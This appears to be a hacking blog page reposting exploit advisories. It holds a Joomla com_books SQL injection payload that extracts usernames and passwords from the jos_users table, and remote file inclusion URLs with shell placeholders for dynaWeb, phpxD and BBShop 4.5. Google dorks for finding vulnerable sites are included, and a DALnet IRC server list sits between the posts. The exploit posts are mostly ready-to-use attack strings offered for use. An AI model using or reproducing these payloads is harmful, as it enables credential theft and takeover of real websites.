Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:

index.php?option=com_books&task=book_details&book_id=[exploit]

#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]



VIVA INDONESIAN CODER TEAM

Read more »

Posted in: Bugs,Hacking

DALnet Servers

CA Servers

maple.ix.ca.dal.net
toronto.on.ca.dal.net

EU Servers

arcor.de.eu.dal.net
brain.hub.eu.dal.net
gaston.se.eu.dal.net
genesis-r.uk.eu.dal.net
matrix.de.eu.dal.net
mozilla.se.eu.dal.net
powertech.no.eu.dal.net
waffle.ix.eu.dal.net

AS Servers

hotspeed.sg.as.dal.net
mesra.kl.my.dal.net

US Servers

aeon.nj.us.dal.net
broadway.ny.us.dal.net
hollywood.ix.us.dal.net
jade.va.us.dal.net
jingo.ix.us.dal.net
loyalty.ix.us.dal.net
masters.ix.us.dal.net
novel.fl.us.dal.net
punch.va.us.dal.net
rangers.ix.us.dal.net
redemption.ix.us.dal.net
riga-r.ca.us.dal.net
rumble.fl.us.dal.net
serenity.ix.us.dal.net
soho.ix.us.dal.net
swiftco.wa.us.dal.net

dal.net


VIVA INDONESIAN CODER TEAM

Read more »

Posted in: mIRC,Tutorial

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Site ve sunucuya erişim sağlanabilir.
# Bug Fix Advice : Undefined değerler tanımlanmalıdır.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]





VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking

BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe

VIVA INDONESIAN CODER TEAM
Get The Code and Fell The SOUL

Read more »

Posted in: Bugs,Hacking